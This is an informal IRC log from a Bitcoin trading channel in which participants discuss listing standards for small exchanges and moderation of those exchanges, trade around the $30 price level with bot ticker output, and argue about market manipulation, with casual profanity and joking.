Current Blocks: 222447 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 1328 blocks | Next Difficulty In About: 1 week, 0 days, 12 hours, 4 minutes, and 4 seconds | Next Difficulty Estimate: 4341299.39731 | Estimated Percent Change: 18.90675 Feb 22 03:20:20 even MPEx which has been pretty picky has had some stuff go bad. Feb 22 03:20:40 !ticker m X.IDIFF.MAR Feb 22 03:20:41 [MPEX:X.IDIFF.MAR] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.07595 / 0.07595 / 0.07595 (8 shares, 0.61 BTC), 30D: 0.0429 / 0.06540414 / 0.089 (338 shares, 22.11 BTC) Feb 22 03:21:17 That would definitely help Feb 22 03:21:32 I was thinking about having a requirement that you actually have been in business for at least 6 months before listing Feb 22 03:21:36 listing fees should be higher Feb 22 03:21:45 at least for the stocks and bonds Feb 22 03:21:46 make it an escrow kind of hting. Feb 22 03:23:00 The escrow side of things I've thought a lot about. The problem is that if the goal is for them to raise funds, well then escrow completely negates the benefit of raising funds. Feb 22 03:23:23 what's the point of selling shares if the company can't use the cash Feb 22 03:23:26 i see. well, if they want to list, they have to put up the trust cash Feb 22 03:23:45 they will make much more if htey are worht it. If they do well, it is returned Feb 22 03:24:12 this is the real world. it can't always be run by the seat of our pants Feb 22 03:24:18 https://en.bitcoin.it/wiki/Contracts#Example_3:_Assurance_contracts Feb 22 03:24:35 one of the things we considered early on was having trading fees higher on the new assets. would deter traders who are not confident in the new asset. Feb 22 03:26:03 to safeguard your good name as an exchange, that is totally worth it. Feb 22 03:26:13 even if you have only 5 assets... it's better than 15 with 10 bad Feb 22 03:26:21 more money for those 5 Feb 22 03:26:35 because more trust, more per person, maybe more people if the trust is high enough Feb 22 03:27:08 quality over quantity, if you can prove that, you will be the #1 exchange. Feb 22 03:27:18 proving that means high standards Feb 22 03:27:29 that's very true Feb 22 03:27:38 mirceaP is not nice, but he keeps out the riff-raff pretty well Feb 22 03:27:42 that's largely why I put together the moderation system Feb 22 03:27:54 i will have to check it out, sorry I haven't yet. Will do very soon. Feb 22 03:28:02 hoping that XX voters in the community will be more eyes and ears into scams than just myself Feb 22 03:28:27 cannot rely on that. You can trust them, but you MUST VERIFY with your own investigation, personal communcation Feb 22 03:28:33 TRUST, but VERIFY Feb 22 03:28:40 without that, btc users are fucked Feb 22 03:28:43 all of us Feb 22 03:28:52 and it's very difficult on here Feb 22 03:29:12 OTC is good start, poor execution and easily games, but it's children may be better. Feb 22 03:29:34 gotta see that for myself to even understand it Feb 22 03:30:09 controls in which sense? Feb 22 03:30:49 burnside did sniff out a user transferring shares for the purpose of voting to get an asset approved and made appropriate changes to the system Feb 22 03:31:11 the whole asset thing i feel can be gamed by someone with enough cash and know-how Feb 22 03:31:18 ont he small exchanges, anyway Feb 22 03:32:50 creating the account to vote you now have to wait 7 days, not impossible, but spendy and a pita Feb 22 03:32:53 i assume people will go to the url in your contract to look for the other side of the story Feb 22 03:33:02 ;;ticker Feb 22 03:33:02 BTCUSD ticker | Best bid: 29.79028, Best ask: 29.89690, Bid-ask spread: 0.10662, Last trade: 29.79028, 24 hour volume: 35115.23774819, 24 hour low: 29.31100, 24 hour high: 29.97800, 24 hour vwap: 29.68355 Feb 22 03:33:37 I'm going to implement something that will show the public each mods vote history as well. it'll still be anon, but if patterns don't match up, then some abuse will get caught Feb 22 03:34:20 working on a way to respond to the comments too, it'll be a generic shoutbox kind of thing, but should help out. Feb 22 03:36:38 yeah, I'm not going to be a judge at a podium determining who passes and fails. I don't think I have the necessary skills to be fair about it. Feb 22 03:37:36 I don't. I think just like GLBSE, it's going to end up being a fatal flaw in some of the other exchanges. Feb 22 03:38:04 I do however feel like a pool of people with a vested interest in the well being of the exchange will do a better job. Feb 22 03:39:35 Surely the decision to list or not list an asset on the NYSE does not come down to just one person. I need to look into it more, but I'm almost certain there's some kind of board that gets together and works things out. Feb 22 03:39:53 Of course, money talks, but you get the idea. Feb 22 03:40:17 I have the lawyer, that's why it's setup the way it is. Feb 22 03:40:57 Belize I just have to do an annual report for taxes. Feb 22 03:41:25 The rest of the reporting I'll probably be able to code into the exchange so you could pull a report automatically if you're a current shareholder. Feb 22 03:42:10 We'll need to grow significantly before we can afford auditing, but it would definitely be a good problem to have. ;) Feb 22 03:42:27 Yeah, I like that feature, very cool. Feb 22 03:43:05 I get nervous about stuff like that though. 5 BTC and a user could attach a doc with a virus in it, guaranteed to reach all of the site mods. Dangerous. Feb 22 03:43:32 Ahhh, I gotcha, that makes sense. Feb 22 03:43:46 there's two phrases that scare the shit out of me "Hi, we're the government and we're here to help you with your business" Feb 22 03:43:52 The exchange fees for the asset issuers is a vector I hadn't considered. I'll definitely think about it. Feb 22 03:44:31 yeah, jpeg, png, pdf, they all have attack vectors unfortunately Feb 22 03:45:13 so while I love the feature, and would love to implement it, you kind of get a feel for the things I have to take into account. Feb 22 03:45:49 I need like two different versions of a command line AV scanner in place first. heh. Feb 22 03:46:18 even that wouldnt' catch hand-crafted attacks Feb 22 03:53:42 here we go Feb 22 03:53:45 ;;ticker Feb 22 03:53:46 BTCUSD ticker | Best bid: 29.79041, Best ask: 29.93315, Bid-ask spread: 0.14274, Last trade: 29.79038, 24 hour volume: 38554.58576011, 24 hour low: 29.31100, 24 hour high: 30.00000, 24 hour vwap: 29.71137 Feb 22 03:54:44 catch y'all later. time to clock out. Feb 22 03:56:30 ;;asks 30 Feb 22 03:56:31 There are currently 5050.5032 bitcoins offered at or under 30.0 USD, worth 151511.635244 USD in total. Feb 22 03:56:36 ;;bids 29 Feb 22 03:56:38 There are currently 7131.364 bitcoins demanded at or over 29.0 USD, worth 209361.72919 USD in total. Feb 22 03:58:37 We reached 30 high Feb 22 03:58:38 GG fuckers Feb 22 03:58:39 :D Feb 22 04:01:57 ;;ticker Feb 22 04:01:57 BTCUSD ticker | Best bid: 29.89000, Best ask: 29.93314, Bid-ask spread: 0.04314, Last trade: 29.89000, 24 hour volume: 38502.76342113, 24 hour low: 29.31100, 24 hour high: 30.00000, 24 hour vwap: 29.71217 Feb 22 04:06:25 [MPEX] [S.MPOE] 12350 @ 0.00063705 = 7.8676 BTC [+] Feb 22 04:07:09 Bowjob: How is that S.DICE price doing??? Feb 22 04:07:34 Profits seem to be up, that dump by erik didnt help speculators Feb 22 04:07:46 what dump? Feb 22 04:07:50 But its no where near your 0.2 predictions Feb 22 04:07:53 did he sell another million? Feb 22 04:08:10 i dont know, there was a recent sell of, who knows from where Feb 22 04:08:16 *off Feb 22 04:08:20 I think he would ahve annouced it Feb 22 04:08:30 could be from a profiteer Feb 22 04:08:48 Well someone selling 1+ million is not unheard of... Feb 22 04:08:48 Well. The funny thing is, right when a new address shows up with some decent coin, the selloff finally starts Feb 22 04:08:50 It probably wont hit the 0.2 target price you're lookinh for Feb 22 04:08:57 We will see Feb 22 04:09:04 if more addresses come online Feb 22 04:09:07 then it wont Feb 22 04:09:08 Maybe I'll sell just before the dividends Feb 22 04:09:14 but I see a few baby whales Feb 22 04:09:22 It hasn't dropped after divvys last two times Feb 22 04:09:27 surprisingsly Feb 22 04:09:33 probably down this time around Feb 22 04:09:37 yeah i would at least take your dividends Feb 22 04:09:48 Yah could be the last great month Feb 22 04:09:52 well.. i speculate the dividends will go down Feb 22 04:09:53 [MPEX] [S.MPOE] 8848 @ 0.00063705 = 5.6366 BTC [+] Feb 22 04:10:02 i mean the share price will go down Feb 22 04:10:06 after the dividends Feb 22 04:10:07 Or we could just be warming up! Feb 22 04:10:16 so i need to sell the shares before this thing tanks.. Feb 22 04:10:19 or goes to the moon Feb 22 04:10:51 right now its looking stable condition Feb 22 04:11:00 pretty soon those whales will figure out they cant win.. lol Feb 22 04:11:40 also it seems that bfl wont ship theirs this month Feb 22 04:11:56 yeah because gamblers always learn Feb 22 04:13:47 Bowjob: I'm pretty sure most already know they can't win... Feb 22 04:13:48 We'll still go up from 30 Feb 22 04:14:03 and gamble for fun and to show they have lots of spare money Feb 22 04:14:17 Theres this dude, proudhon.. quite a bear. if he turns into a bull, we know the things gonna crash Feb 22 04:14:17 lol Feb 22 04:14:45 Thing is gonna crash no matter what Feb 22 04:15:15 of course.. crash Feb 22 04:15:15 ;;asks Feb 22 04:15:15 (asks [--over] ) -- Calculate the amount of bitcoins for sale at or under . If '--over' option is given, find coins or at or over . Feb 22 04:15:17 upwards Feb 22 04:15:19 :) Feb 22 04:15:22 ;;asks 30 Feb 22 04:15:23 There are currently 3601.3139 bitcoins offered at or under 30.0 USD, worth 108039.417301 USD in total. Feb 22 04:15:25 No, downward Feb 22 04:15:28 I'm taking 15% off the table Feb 22 04:15:53 ;ticker Feb 22 04:15:53 as soon as I get 6 confirms Feb 22 04:15:55 ;;ticker Feb 22 04:15:56 BTCUSD ticker | Best bid: 29.91002, Best ask: 29.99999, Bid-ask spread: 0.08997, Last trade: 29.91000, 24 hour volume: 42286.15180078, 24 hour low: 29.31100, 24 hour high: 30.00000, 24 hour vwap: 29.73967 Feb 22 04:16:22 and wall @ 30 is breaking Feb 22 04:16:24 the 30 wall is getting eaten fucking fast now that we are touching it Feb 22 04:16:38 people know that once it goes, we go up a dollar Feb 22 04:16:39 fast Feb 22 04:18:03 ;;ticker Feb 22 04:18:04 BTCUSD ticker | Best bid: 30.05000, Best ask: 30.09999, Bid-ask spread: 0.04999, Last trade: 30.10000, 24 hour volume: 44229.13560627, 24 hour low: 29.31100, 24 hour high: 30.10000, 24 hour vwap: 29.75268 Feb 22 04:18:09 going Feb 22 04:18:13 gone Feb 22 04:18:17 ;;ticker Feb 22 04:18:18 BTCUSD ticker | Best bid: 30.05000, Best ask: 30.17900, Bid-ask spread: 0.12900, Last trade: 30.17900, 24 hour volume: 44329.13560627, 24 hour low: 29.31100, 24 hour high: 30.17900, 24 hour vwap: 29.75355 Feb 22 04:18:23 fast Feb 22 04:18:41 whales fucking slingshot us over Feb 22 04:19:07 time to pull my call sales Feb 22 04:19:42 yeah Feb 22 04:21:10 um, whats a call sale? Feb 22 04:21:19 you put in a sell at a $30? Feb 22 04:21:30 ignoramus needs education Feb 22 04:21:46 mpex options Feb 22 04:21:51 thx Feb 22 04:21:56 suppose we hit 32 Feb 22 04:21:59 the what Feb 22 04:22:08 I was selling $25, 26 and 27s. Feb 22 04:23:16 then my investment is safe. and I'm making 1500, plus some btc left over to try to increase on lows/highs on gox Feb 22 04:23:27 get my btc back on drops Feb 22 04:25:38 someone buy all my PT shares. I wanna be the guy who sells at the top. Feb 22 04:25:52 I'm holding too many shares right now. Feb 22 04:26:01 pt shares? Feb 22 04:26:17 passthru/ Feb 22 04:26:29 argh Feb 22 04:26:41 ;;ticker Feb 22 04:26:42 BTCUSD ticker | Best bid: 30.20000, Best ask: 30.23000, Bid-ask spread: 0.03000, Last trade: 30.20000, 24 hour volume: 44696.56851652, 24 hour low: 29.31100, 24 hour high: 30.30000, 24 hour vwap: 29.75824 Feb 22 04:26:45 going to 31 Feb 22 04:26:57 ;;bc,convert eur Feb 22 04:26:57 1 BTC = 30.30000 U.S. dollars = 22.6322079 Euros Feb 22 04:27:03 I'm selling S.DICE/S.MPOE/S.BBET on BTCT.co for those who can't pay 30 BTC for an MPEx account. Feb 22 04:27:40 thank jebus, that wall is resetting down near 31 Feb 22 04:27:45 we'll see though Feb 22 04:28:02 guys Feb 22 04:28:04 I figured it out Feb 22 04:28:06 .!!! Feb 22 04:28:11 Why the recent price surge Feb 22 04:28:12 http://latimesblogs.latimes.com/photos/uncategorized/2008/08/22/dead_bear_killed_and_poached.jpg Feb 22 04:28:12 ;;asks 31.25 Feb 22 04:28:14 There are currently 4662.0557 bitcoins offered at or under 31.25 USD, worth 143761.456325 USD in total. Feb 22 04:28:14 :D Feb 22 04:29:16 lol... someone bought bitcoins and killed all the bears... Feb 22 04:29:20 this is insane buying. plutocracy of whales Feb 22 04:29:38 eatne up Feb 22 04:30:12 fuk u gox. I got 8 confirms Feb 22 04:30:15 where is my coins Feb 22 04:30:27 me too Feb 22 04:30:29 piss me off Feb 22 04:30:56 well Feb 22 04:31:01 ;;asks 30 Feb 22 04:31:03 There are currently 0 bitcoins offered at or under 30.0 USD, worth 0.0 USD in total. Feb 22 04:31:03 maybe this will just make me more money Feb 22 04:31:04 lol Feb 22 04:31:05 hehe Feb 22 04:31:07 ha Feb 22 04:31:08 ;;asks 31 Feb 22 04:31:09 There are currently 3364.4518 bitcoins offered at or under 31.0 USD, worth 103884.668102 USD in total. Feb 22 04:31:11 awesome Feb 22 04:31:15 ;;asks 32 Feb 22 04:31:15 here we go Feb 22 04:31:16 There are currently 13676.531 bitcoins offered at or under 32.0 USD, worth 431569.109649 USD in total. Feb 22 04:31:41 This is some historic shit going on Feb 22 04:32:00 stop before 32? Feb 22 04:32:01 Guys are we growing too fast?? Feb 22 04:32:04 next plateaut? Feb 22 04:32:06 ahahaha Feb 22 04:32:08 yes Bowjob Feb 22 04:32:18 but profit now, ask questions later Feb 22 04:32:22 LOL Feb 22 04:32:23 it may crash, we buy back Feb 22 04:32:23 :D Feb 22 04:32:37 K, sell at 32, buy back at $1? Feb 22 04:32:49 damn right, closer to 6-10, but yes Feb 22 04:33:01 I don't think it will crash to 1 this time. Feb 22 04:33:04 Getting slightly nervous now Feb 22 04:33:11 We might just go to 50 and crash to 10. Feb 22 04:33:13 We are going way too effing high Feb 22 04:33:26 Id prefer 1-2 dollars per month Feb 22 04:33:40 too bad its not about what you prefer Feb 22 04:33:41 I would prefer $50 tonight Feb 22 04:33:42 I made a bullshit prediction picture, lemme see if i can find it Feb 22 04:33:56 http://loophole4all.com/ Feb 22 04:33:58 the real results are even better Feb 22 04:34:12 [BTCTC] [MININGCO.ETF] 5 @ 0.58 = 2.9 BTC [-] Feb 22 04:34:17 they are good fun Feb 22 04:34:52 3.42 K to get to 01 Feb 22 04:34:55 31 Feb 22 04:35:00 ;;ticker Feb 22 04:35:01 BTCUSD ticker | Best bid: 30.46999, Best ask: 30.47000, Bid-ask spread: 0.00001, Last trade: 30.46999, 24 hour volume: 45550.22658526, 24 hour low: 29.31100, 24 hour high: 30.55000, 24 hour vwap: 29.77235 Feb 22 04:36:11 struggle to break 31, sell bell curve around 31.50 Feb 22 04:36:31 tiny transactoins, penny bot HAMMERING Feb 22 04:36:32 how come gox shows at 30.5 Feb 22 04:36:33 for me Feb 22 04:36:34 UP UP UP Feb 22 04:36:55 I just saw 30 buys at .10 up up up Feb 22 04:37:10 someone is jamming this thing hard Feb 22 04:37:16 god Feb 22 04:37:22 I lost so much money on Seal Feb 22 04:37:24 seals Feb 22 04:37:29 probably let lemming fill in, then dump at 6:50AM eastern time. Feb 22 04:37:33 I've noticed that trend Feb 22 04:37:38 150BTC was not that much back when I started Feb 22 04:37:43 fuck an a Feb 22 04:38:03 yeah when i feel bad, i think of a pizza guy. Feb 22 04:38:07 hahaha Feb 22 04:38:09 pizza guy Feb 22 04:38:20 he did a service to us all. the first real media Feb 22 04:38:28 here's to pizza guy Feb 22 04:38:41 seriously though 9 confirms Feb 22 04:38:44 where are mah coins Feb 22 04:38:49 This is why its going up Feb 22 04:38:49 i'm at 5 Feb 22 04:38:54 nobody can get their coins in Feb 22 04:38:58 cos nobody can get btc in Feb 22 04:39:03 30.65 Feb 22 04:39:06 i have about 50 there Feb 22 04:39:13 if anyone wants em Feb 22 04:39:32 nah Feb 22 04:39:39 I will wait Feb 22 04:39:52 MtGox says: No one deposits/sell before we do... all sales suspended Feb 22 04:39:57 We rich, you suck Feb 22 04:40:05 haha Feb 22 04:40:09 true that Feb 22 04:41:09 stuck on 5 txns Feb 22 04:41:13 shittles Feb 22 04:41:22 good times tonight, folks. Feb 22 04:41:25 funded Feb 22 04:41:29 ;;slap Bugpowder Feb 22 04:41:41 ;;slap truffles Feb 22 04:41:47 ;;slap DeadWeasel Feb 22 04:41:51 nice Feb 22 04:42:06 stop with the unnecessary spam Feb 22 04:42:10 I'm gonna kitll the rally Feb 22 04:42:13 sry Feb 22 04:42:27 ;;slap kakobrekla Feb 22 04:42:29 i love you man Feb 22 04:42:31 :) Feb 22 04:43:24 put in your changes to my shite website, btw Feb 22 04:43:27 good input Feb 22 04:43:32 more will be done tomorrow Feb 22 04:43:39 BUGPOWDER, NOT YET! Feb 22 04:43:53 WAIT TILL THERE'S A LONG THIN LINE OF BIDS! Feb 22 04:44:09 THIS IS CAPS LOCK NATION Feb 22 04:44:12 then you can sell in multiple mini increments and crash like half a USD/BTC each time Feb 22 04:44:17 i cant load charts lol Feb 22 04:44:25 wtf is up with ppl here latley, all on drugs. Feb 22 04:44:31 gawd its so laggy Feb 22 04:44:42 I have asks below the bid price up for 2 minutes Feb 22 04:44:42 gox is hammered Feb 22 04:44:43 We are going to the moon landing! Feb 22 04:44:48 hmm, btc people now have a lot of btc... hmm what can they use them for.. drugs? :) Feb 22 04:44:52 silk road became too cheap with this btc value rise Feb 22 04:44:57 errybodys doing it Feb 22 04:45:00 You know what.. this place is full of noise!! Feb 22 04:45:11 The best strat.. is to buy bitcoins and forget them Feb 22 04:45:12 silk road going to be sold out pretty damn soon Feb 22 04:45:24 check in 2 years and find youself a millionaire Feb 22 04:45:28 but Nooooooooooooo Feb 22 04:45:31 Bowjob: except the private key, never forget that one. Feb 22 04:45:40 no one simply gets out of bitcoin news Feb 22 04:46:56 so, when it crashes, how to do by btc by CC? Feb 22 04:47:00 :) Feb 22 04:47:10 raised my limit just for that Feb 22 04:47:24 your actions are useless Feb 22 04:47:29 would assbot say. Feb 22 04:48:24 Man. wheres my ASIC Feb 22 04:48:25 lol Feb 22 04:50:54 sells went up Feb 22 04:50:55 ;;ticker Feb 22 04:50:56 BTCUSD ticker | Best bid: 30.24001, Best ask: 30.34990, Bid-ask spread: 0.10989, Last trade: 30.24001, 24 hour volume: 46512.50490835, 24 hour low: 29.31100, 24 hour high: 30.65000, 24 hour vwap: 29.78649 Feb 22 04:51:05 got out at 30.4 Feb 22 04:52:31 where is your SL ant TP? Feb 22 04:52:39 and Feb 22 04:53:11 less acronyms, more info Feb 22 04:53:41 I'm a just small time douche who got in with his life savings and got out with 50% more, plus an extra 100btc to play with now Feb 22 04:53:45 ;;ask Feb 22 04:53:45 Error: "ask" is not a valid command. Feb 22 04:53:50 ;;ticker Feb 22 04:53:51 BTCUSD ticker | Best bid: 30.14601, Best ask: 30.35899, Bid-ask spread: 0.21298, Last trade: 30.35899, 24 hour volume: 46579.10632984, 24 hour low: 29.31100, 24 hour high: 30.65000, 24 hour vwap: 29.78865 Feb 22 04:54:10 maybe someone wants to make the price of bitcoin the same as pi Feb 22 04:54:18 but shift the decimal place over Feb 22 04:54:35 right Feb 22 04:54:44 less talk more read Feb 22 04:55:19 i need more read, no doubt Feb 22 04:55:33 [MPEX] [S.MPOE] 4351 @ 0.00064073 = 2.7878 BTC [+] Feb 22 04:55:34 [MPEX] [S.MPOE] 4321 @ 0.00064112 = 2.7703 BTC [+] Feb 22 04:55:37 Time to put the Tesla deposit down :) Feb 22 04:55:37 [MPEX] [S.MPOE] 3673 @ 0.00064113 = 2.3549 BTC [+] Feb 22 04:55:50 3.14159265359 Feb 22 04:56:26 265358929323846264338327950288419713939937510 Feb 22 04:56:33 I think.... Feb 22 04:56:36 how about 31.4159 Feb 22 04:56:36 damn skippy Feb 22 04:56:38 :) Feb 22 04:56:51 close, with decimal errros Feb 22 04:58:14 [MPEX] [S.MPOE] 61524 @ 0.00064113 = 39.4449 BTC [+] Feb 22 04:58:19 Boom Feb 22 04:58:20 out Feb 22 04:58:24 done Feb 22 04:58:41 now let the rally continue Feb 22 04:58:43 PLEASE Feb 22 04:58:50 till tomorrow night at least Feb 22 04:59:24 lol Feb 22 04:59:26 ;;ticker Feb 22 04:59:27 BTCUSD ticker | Best bid: 30.10000, Best ask: 30.19999, Bid-ask spread: 0.09999, Last trade: 30.19999, 24 hour volume: 48532.80588620, 24 hour low: 29.31100, 24 hour high: 30.65000, 24 hour vwap: 29.80061 Feb 22 04:59:33 Oh no!! Feb 22 04:59:36 We are crashing Feb 22 04:59:36 :/ Feb 22 04:59:37 seems dead Feb 22 05:01:21 dumped 2k in there Feb 22 05:01:46 btce needs to move a wall Feb 22 05:02:53 I want a wall at 1000 Feb 22 05:03:29 we need like 5 blocks right htis second Feb 22 05:03:29 spam detected Feb 22 05:03:31 manually Feb 22 05:04:08 TESSSSSSLA Feb 22 05:04:23 I want a bored billionaire play around with BTC Feb 22 05:04:33 me too Feb 22 05:04:52 yes, got my btc out at 30.3 Feb 22 05:04:54 now crash Feb 22 05:05:14 you do realize Feb 22 05:05:17 if I sell my btc now Feb 22 05:05:23 btc will go straight to 60 Feb 22 05:05:25 it WILL GO UP Feb 22 05:05:26 YES Feb 22 05:05:28 SELL Feb 22 05:05:28 SELL Feb 22 05:05:29 SELL Feb 22 05:05:50 when I sold a lot of them at 15 Feb 22 05:05:51 ah you guys are hysterical Feb 22 05:05:57 back before the last peak Feb 22 05:06:03 a month later it hit the historical peak Feb 22 05:06:11 terrible is what it is. Feb 22 05:06:14 if someone bought at 32.. then forgot about btc Feb 22 05:06:16 and check back now Feb 22 05:06:20 tjheyd be.. hmm Feb 22 05:06:22 nothing wrong Feb 22 05:06:23 lol Feb 22 05:06:30 lol Feb 22 05:06:50 thats why.. we need to stop watching the markets Feb 22 05:07:06 Im going to make some food Feb 22 05:07:10 the send should be done by then Feb 22 05:07:19 Bugpowder: go eat, it always goes up Feb 22 05:07:24 hehe Feb 22 05:07:29 time to drink actually Feb 22 05:07:36 We should do a vegas trip Feb 22 05:07:36 me too Feb 22 05:07:59 but yeahh, Im going to enjoy two monitors again Feb 22 05:08:04 my productivity will go though the roof Feb 22 05:08:15 two 24s is the shit Feb 22 05:08:17 i love it Feb 22 05:08:19 Now I actually want out of Dice now Feb 22 05:08:25 heh Feb 22 05:08:26 me too Feb 22 05:08:28 I have 3 24s Feb 22 05:08:33 but Feb 22 05:08:33 NICE! Feb 22 05:08:33 I have a 26" 1920x1200 and my dead laptop Feb 22 05:08:37 I have 49 shares Feb 22 05:08:37 its overkill Feb 22 05:08:40 I mean 64 shares Feb 22 05:08:40 hhahaha Feb 22 05:08:41 mhm Feb 22 05:08:41 IRC goes on the laptop so it doesnt distract me Feb 22 05:08:48 yeah Feb 22 05:08:53 2 24s for matlab Feb 22 05:09:00 1 24 for laptop Feb 22 05:09:03 and laptop Feb 22 05:09:05 ugh Feb 22 05:09:09 well Im going to buy one of those monoprice 30s Feb 22 05:09:12 I am being irradiated Feb 22 05:09:15 turn my 26 sideways for my mbp Feb 22 05:09:20 they make monitors now? Feb 22 05:09:23 and then have my 30 for my desktop Feb 22 05:09:29 Bugpowder: YES Feb 22 05:09:31 DUDE Feb 22 05:09:42 are they high quality? Feb 22 05:09:56 http://www.monoprice.com/products/product.asp?c_id=113&cp_id=11307&cs_id=1130703&p_id=10235&seq=1&format=1#largeimage Feb 22 05:10:09 thats the single dvi version Feb 22 05:10:15 http://www.monoprice.com/products/product.asp?c_id=113&cp_id=11307&cs_id=1130703&p_id=10234&seq=1&format=1#largeimage Feb 22 05:10:18 thats the shitload of ports version Feb 22 05:10:22 both identically same monitor Feb 22 05:10:29 uses the same IPS as all the other 30" IPS screens Feb 22 05:10:32 no scaler, no buffer Feb 22 05:10:33 ;;ticker Feb 22 05:10:33 BTCUSD ticker | Best bid: 30.19898, Best ask: 30.28730, Bid-ask spread: 0.08832, Last trade: 30.19898, 24 hour volume: 48629.35769652, 24 hour low: 29.31100, 24 hour high: 30.65000, 24 hour vwap: 29.80257 Feb 22 05:10:44 hmmm Feb 22 05:10:50 I may get one for work Feb 22 05:11:22 hm, euro dollars, better than btc i guess http://shrani.si/f/r/sY/4j1rT7UB/tmp3f19.png Feb 22 05:11:50 http://www.rakuten.com/prod/24-wide-led-monitor/229409964.html?listingId=218720436 Feb 22 05:11:53 good deal Feb 22 05:12:31 Bugpowder: well, I would consider getting 6 Feb 22 05:12:33 but meh Feb 22 05:12:42 thats just a tad overkill Feb 22 05:13:07 plus you gotta mount them, good luck Feb 22 05:13:13 ;;ask Feb 22 05:13:13 Error: "ask" is not a valid command. Feb 22 05:13:16 ;;ticker Feb 22 05:13:16 BTCUSD ticker | Best bid: 30.00001, Best ask: 30.15045, Bid-ask spread: 0.15044, Last trade: 30.15045, 24 hour volume: 49645.07046157, 24 hour low: 29.31100, 24 hour high: 30.65000, 24 hour vwap: 29.80740 Feb 22 05:13:24 Oh no! We are crashing!! Feb 22 05:14:42 no Feb 22 05:15:30 ;;ticker Feb 22 05:15:30 BTCUSD ticker | Best bid: 30.04084, Best ask: 30.15543, Bid-ask spread: 0.11459, Last trade: 30.15543, 24 hour volume: 49622.64900365, 24 hour low: 29.31100, 24 hour high: 30.65000, 24 hour vwap: 29.80752 Feb 22 05:15:35 k nvm Feb 22 05:15:35 klol Feb 22 05:15:46 bids coming in Feb 22 05:15:57 need some booze, brb Feb 22 05:16:00 asks coming in you mean Feb 22 05:16:38 why dont we get warren buffet here and ask him if btc will go up or down Feb 22 05:16:52 warren buffet doesnt give a shit about forex Feb 22 05:16:59 he invests in value not made up shit Feb 22 05:17:14 Diablo-D3: damn right Feb 22 05:17:56 so, according to goxlive Feb 22 05:18:07 it'd cost a million to go to 36 Feb 22 05:18:16 which is only 25k btc Feb 22 05:18:47 but to go to 26 it'd cost 40k btc, worth 1.2 million Feb 22 05:18:52 so I think we're still going up Feb 22 05:19:57 Deep Feb 22 05:20:12 nope Feb 22 05:20:14 going down Feb 22 05:20:59 u no wat wuld be so fune Feb 22 05:21:05 if we crashed to 15 tonight Feb 22 05:21:11 well i admit it would be funny if we crashed hard now Feb 22 05:21:12 and my puts made money Feb 22 05:21:20 plz Feb 22 05:21:29 no~ Feb 22 05:21:32 somehow i doubt it Feb 22 05:21:43 we are going to the moon Feb 22 05:22:02 so when do you start buying again/ Feb 22 05:22:04 25 Feb 22 05:22:06 someone big is still manipulating, possibly others too Feb 22 05:22:08 20? 15? Feb 22 05:22:16 manipulating? Feb 22 05:22:21 do you mean trying to sell shares? Feb 22 05:22:25 err coins? Feb 22 05:22:47 buying single digits!! Feb 22 05:22:59 i mean manipulating. pump dump. then settle the price for a while, pump dump, settle the price. using bots, and everything else illegal in SEC markets Feb 22 05:23:10 lol Feb 22 05:23:11 ugh. Feb 22 05:23:15 none of that is illegal Feb 22 05:23:18 you know, that makes absolutely no sense. Feb 22 05:23:33 2) markets do not need that to display their dynamics Feb 22 05:23:34 mircea_popescu: it makes perfect sense. Feb 22 05:23:38 Yes a dead bear! Feb 22 05:23:39 mircea_popescu nothign here does anymore :( Feb 22 05:24:03 kakobrekla: ever more correct you are Feb 22 05:24:09 i just have theories Feb 22 05:24:13 just like the rest of you Feb 22 05:24:25 twats Feb 22 05:24:35 DeadWeasel listen. the theory whereby it is feasible to buy up a commodity in order to sell it later is nonsense. Feb 22 05:24:41 spam detected, manually. Feb 22 05:24:43 you will spend more "fixing" the price than you'll make selling. Feb 22 05:24:54 people keep trying. people always fail. Feb 22 05:25:07 proof? Feb 22 05:25:09 most recently the notable silver market cornering, read up on that. it wasted a billion dollar fortune Feb 22 05:25:13 your opinion? Feb 22 05:25:13 sigh. Feb 22 05:25:22 just saying Feb 22 05:25:45 ;;google "the hunt brothers" Feb 22 05:25:47 Nelson Bunker Hunt - Wikipedia, the free encyclopedia: ; Silver Thursday - Wikipedia, the free encyclopedia: ; Educate Yourself - The Hunt Brothers and the Silver Bubble: Feb 22 05:25:52 seriously, this is basic stuff. Feb 22 05:25:56 OP delivers Feb 22 05:26:35 again, I just have opinions, and I've stated before, they are largely uneducated Feb 22 05:26:41 "only new thing in this world is the history you didn't know". Feb 22 05:26:43 so quit yer bitchin Feb 22 05:27:25 got a problem with an uneducated twat, it's your problem. I'd love to be educated,but ya'll don't know shit more about this than anyone else. Feb 22 05:27:42 guessing at this market is bullshit Feb 22 05:27:53 so read up on the stuff! Feb 22 05:28:27 the stuff. how could forget. who's stuff' Feb 22 05:28:30 your stuff? Feb 22 05:28:33 usagi's stuff? Feb 22 05:28:37 pirates stuff? Feb 22 05:28:44 jesus' stuff? Feb 22 05:29:01 I would start with MPs Feb 22 05:29:06 and then just stop Feb 22 05:29:20 LOL Feb 22 05:29:21 YES Feb 22 05:29:23 MPs stuff is shite Feb 22 05:29:30 no offense,but you write crap Feb 22 05:29:30 ok read wikipedia Feb 22 05:29:43 wiki, i can work with that, but none of it applies to BTC Feb 22 05:29:44 dude, srsly. the hunt brothers and their silvery misadventure. Feb 22 05:29:59 da fuck none of it applies to btc. what is btc, a meteorite ? Feb 22 05:30:16 http://en.wikipedia.org/wiki/Meteorite Feb 22 05:30:37 thanks kakobrekla Feb 22 05:30:46 meteorits fall to earth Feb 22 05:30:58 meteors do not Feb 22 05:31:08 you should know, it's your business Feb 22 05:31:58 well anyway, this entire "someone is mainipulating by buying to inflate the price to sell later" stuff is the economic equivalent of the perpetuum mobile machine. Feb 22 05:32:04 you can't pull yourself up by your britches. Feb 22 05:33:04 no, but you can manipulate, or the SEC wouldn't exist for legit markets Feb 22 05:33:16 haha, usagi, you were there Feb 22 05:33:21 when jesus was born Feb 22 05:33:24 what do you think HFT does all day long? Feb 22 05:33:31 you took his gold, silver, and myrhh Feb 22 05:33:47 i know, now i have to sacrifice my child. Feb 22 05:34:12 yes well, the sec isn't there to do what you think it does i'm affraid. Feb 22 05:34:53 it used to be. Feb 22 05:34:57 not anyomore. Feb 22 05:35:05 but the priciple applies Feb 22 05:35:21 all the institutions have be co=opted by twats Feb 22 05:35:38 that's why i like the blockchain Feb 22 05:35:49 ain't no co-opting of that Feb 22 05:35:49 http://images.uncyc.org/en/3/3e/LeeWall_Destroy.gif Feb 22 05:36:20 ok, ok, but natural 